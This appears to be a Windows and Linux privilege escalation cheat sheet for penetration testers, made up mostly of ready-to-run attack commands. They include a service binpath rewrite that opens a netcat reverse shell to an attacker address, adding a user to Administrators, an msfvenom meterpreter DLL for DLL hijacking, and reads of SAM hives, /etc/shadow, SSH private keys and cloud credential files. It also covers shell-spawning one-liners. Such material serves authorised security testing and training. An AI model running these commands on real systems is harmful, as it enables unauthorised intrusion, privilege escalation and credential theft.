Find an Exploit

Privilege Escalation Master

Here you will find a quick cheatsheet for Windows and Linux privilege escalation vulnerabilities within every type of vulnerability there's a link to a database of vulnerbilities, a tip or a link to a tool to quickly guide you to the right exploit.

Windows

Kernel


OS name and version:
>C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Check drivers:
driverquery
Check Patches:
>wmic qfe get Caption,Description,HotFixID,InstalledOn
Tools for enumeration:
Sherlock
Watson
Windows Exploit Suggester
Got lucky ?
Search Kernel Exploits Here

Services


Enumeration:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\output.txt

Modify a service binary:
>sc config [Service_Name] binpath= "C:\nc.exe -nv X.X.X.X 8888 -e C:\WINDOWS\System32\cmd.exe"

>sc config [Service_Name] binpath= "net localgroup administrators username /add"
>sc config [Service_Name] binpath= "C:\Documents and Settings\%username%\reverseshell.exe"

Restart service:
>wmic service NAMEOFSERVICE call startservice
>net stop [service name] && net start [service name]

Unquoted Service Path


If the path to an executable is not inside quotes, Windows will try to execute the service executable from inside each directory. For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\reverseshell.exe
C:\Program Files\reverseshell.exe
C:\Program Files\Some Folder\reverseshell.exe

enumeration command:
>wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
Check Permissions:

>icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
>icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
>icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
>icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Need some help?
List of applications that will possibly have this issue click here

DLL Hijacking


Windows has a search path for DLLs in its underlying architecture. If you can figure out what DLLs an executable requests without an absolute path (triggering this search process), you can then place your hostile DLL somewhere higher up the search path so it’ll be provided to the application before the real version.
Search order:
The directory from which the application loaded.
The system directory. (C:\Windows\System32)
The 16-bit System Directory. (C:\Windows\System)
The Windows directory. (C:\Windows)
The current directory.
The directories that are listed in the PATH environment variable.

Enumeration:
>wmic process > outfile
>tasklist /FO CSV > tasks.txt

Enumeration tools:

Robber
Enumeration Tool

Autoruns
Find startup programs and show the file path the program runs from.

Procmon
Apply a basic filter with the following properties:
Process Name is <[Value]>
Result is <[NAME NOT FOUND]>
Path ends with .dll*

Powersploit tool to enumerate and exploit:
Find-ProcessDLLHijack
Find-PathDLLHijack
Write-HijackDll

Now utilize the search order and check where is the original dll loaded from. in case it`s loaded from The windows directory then you can use the first 3 to inject your dll.

Check Permissions:
>icacls .

Generate the dll file
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8888 -f dll > output.dll

Disclosed Credentials


Search for files containing passwords:
>findstr /si password *.xml *.ini *.txt *.config 2>nul
>findstr /si pass *.txt | *.xml | *.ini

Check unattended files:
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf

Check SAM and SYSTEM files:

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud Credentials
Check user home for below directories/files:
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

Other enumeration commands:


Info about current user:
>whoami
>echo %USERNAME%
>whoami /priv
Other users:
>net users
>dir /b /ad "C:\Users\"
Groups:
>net localgroup
>net localgroup Administrators
>whoami /all

Network connections and the firewall rules:
>netstat -ano
>netsh firewall show state
>netsh firewall show config

Checking AV:
>WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
Check clipboard content:
>powershell -command "Get-Clipboard"
Processes and services:
>tasklist /SVC
>tasklist /v
>net start
>sc query
Installed Programs:
>dir /a "C:\Program Files"
>dir /a "C:\Program Files (x86)"
>reg query HKEY_LOCAL_MACHINE\SOFTWARE

Run at Startup:
>wmic startup get caption,command
>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
>reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
>reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
>dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
>dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Scheduled tasks:
>schtasks /query /fo LIST 2>nul | findstr TaskName
>dir C:\windows\tasks

Linux

Kernel


Check the OS / Architecture / Kernel version:
$uname -a
$uname -mrs
$cat /proc/version
$cat /etc/issue
$cat /etc/*-release
$cat /etc/lsb-release # Debian based
$cat /etc/redhat-release # Redhat based
$rpm -q kernel
$dmesg | grep Linux
$ls /boot | grep vmlinuz-

Check Development Environment on Target Hosts:
$find / -name perl*
$find / -name python*
$find / -name gcc*
$find / -name cc

use searchsploitto find an exploit

or search through hacking-resources here

Services


Check running services:
$ps aux
$ps -ef
$top
$cat /etc/services
$netstat -antup
Check what services is running as root using the following commands:
$ps aux | grep root
$ps -ef | grep root

Check installed application and check if they`re running:
$ls -alh /usr/bin/
$ls -alh /sbin/
$dpkg -l
$rpm -qa
$ls -alh /var/cache/apt/archives
$ls -alh /var/cache/yum/

Check services configuration:
$cat /etc/syslog.conf
$cat /etc/chttp.conf
$cat /etc/lighttpd.conf
$cat /etc/cups/cupsd.conf
$cat /etc/inetd.conf
$cat /etc/apache2/apache2.conf
$cat /etc/my.conf
$cat /etc/httpd/conf/httpd.conf
$cat /opt/lampp/etc/httpd.conf
$ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

Then check if running services have public exploits use $searchsploit or google.
If the service is running as root check what can you execute with the service.

Suid and Guid Misconfiguration


When a binary with suid permission is run it is run as another user, and therefore with the other users privileges. So we can try exploiting that behaviour.

Enumeration:
#Find SUID
$find / -perm -u=s -type f 2>/dev/null
#Find GUID
$find / -perm -g=s -type f 2>/dev/null
$find / -perm -u=s -type f 2>/dev/null
$find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
$find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

a good place to look for this type of exploits is
GTFOBins

Disclosed Credentials


Enumeration:
#Search history files
$cat ~/.bash_history
$cat ~/.nano_history
$cat ~/.atftp_history
$cat ~/.mysql_history
$cat ~/.php_history
#Other files that may contain passwords
$cat /var/apache2/config.inc
$cat /var/lib/mysql/mysql/user.MYD
$cat /root/anaconda-ks.cfg
$cat /etc/syslog.conf
$cat /etc/chttp.conf
$cat /etc/lighttpd.conf
$cat /etc/cups/cupsd.conf
$cat /etc/inetd.conf
$cat /etc/apache2/apache2.conf
$cat /etc/my.conf
$cat /etc/httpd/conf/httpd.conf
$cat /opt/lampp/etc/httpd.conf
$ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

#Finding SSH private keys
$cat ~/.ssh/authorized_keys
$cat ~/.ssh/identity.pub
$cat ~/.ssh/identity
$cat ~/.ssh/id_rsa.pub
$cat ~/.ssh/id_rsa
$cat ~/.ssh/id_dsa.pub
$cat ~/.ssh/id_dsa
$cat /etc/ssh/ssh_config
$cat /etc/ssh/sshd_config
$cat /etc/ssh/ssh_host_dsa_key.pub
$cat /etc/ssh/ssh_host_dsa_key
$cat /etc/ssh/ssh_host_rsa_key.pub
$cat /etc/ssh/ssh_host_rsa_key
$cat /etc/ssh/ssh_host_key.pub
$cat /etc/ssh/ssh_host_key
#Locate files with user or pass
$grep -i user [filename]
$grep -i pass [filename]

Cron Jobs


Enumeration:
$crontab -l
$ls -alh /var/spool/cron
$ls -al /etc/ | grep cron
$ls -al /etc/cron*
$cat /etc/cron*
$cat /etc/at.allow
$cat /etc/at.deny
$cat /etc/cron.allow
$cat /etc/cron.deny
$cat /etc/crontab
$cat /etc/anacrontab
$cat /var/spool/cron/crontabs/root
To exploit this overwrite the cron file with misconfigured permissions or inject code in it.

$sudo


Enumeration:
#List Sudoers $cat /etc/sudoers
#Show which commands sudo allows you to run $sudo -l
You can use GTFOBins here too.

Spawning a TTY Shell


$python -c 'import pty; pty.spawn("/bin/sh")'

$echo os.system('/bin/bash')
$/bin/sh -i

$perl -e 'exec "/bin/sh";'
perl: $exec "/bin/sh";

ruby: $exec "/bin/sh"

lua: $os.execute('/bin/sh')

From within IRB:
$exec "/bin/sh"
From within vi:
:!bash
From within vi:
:set shell=/bin/bash:shell
From within nmap:
!sh

Other Commands


#Check sensitive files $cat /etc/passwd
$cat /etc/group
$cat /etc/shadow
$ls -alh /var/mail/

#Check user history $cat ~/.bash_history
$cat ~/.nano_history
$cat ~/.atftp_history
$cat ~/.mysql_history
$cat ~/.php_history

#World writable files:

$find / -writable -type d 2>/dev/null # world-writeable folders
$find / -perm -222 -type d 2>/dev/null # world-writeable folders
$find / -perm -o w -type d 2>/dev/null # world-writeable folders
$find / -perm -o x -type d 2>/dev/null # world-executable folders
$find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

#Find a way to upload files:
$find / -name wget
$find / -name nc*
$find / -name netcat*
$find / -name tftp*
$find / -name ftp

#List environment variables $cat /etc/profile
$cat /etc/bashrc
$cat ~/.bash_profile
$cat ~/.bashrc
$cat ~/.bash_logout
$env

#Check log files:

$cat /etc/httpd/logs/access_log
$cat /etc/httpd/logs/access.log
$cat /etc/httpd/logs/error_log
$cat /etc/httpd/logs/error.log
$cat /var/log/apache2/access_log
$cat /var/log/apache2/access.log
$cat /var/log/apache2/error_log
$cat /var/log/apache2/error.log
$cat /var/log/apache/access_log
$cat /var/log/apache/access.log
$cat /var/log/auth.log
$cat /var/log/chttp.log
$cat /var/log/cups/error_log
$cat /var/log/dpkg.log
$cat /var/log/faillog
$cat /var/log/httpd/access_log
$cat /var/log/httpd/access.log
$cat /var/log/httpd/error_log
$cat /var/log/httpd/error.log
$cat /var/log/lastlog
$cat /var/log/lighttpd/access.log
$cat /var/log/lighttpd/error.log
$cat /var/log/lighttpd/lighttpd.access.log
$cat /var/log/lighttpd/lighttpd.error.log
$cat /var/log/messages
$cat /var/log/secure
$cat /var/log/syslog
$cat /var/log/wtmp
$cat /var/log/xferlog
$cat /var/log/yum.log
$cat /var/run/utmp
$cat /var/webmin/miniserv.log
$cat /var/www/logs/access_log
$cat /var/www/logs/access.log
$ls -alh /var/lib/dhcp3/
$ls -alh /var/log/postgresql/
$ls -alh /var/log/proftpd/
$ls -alh /var/log/samba/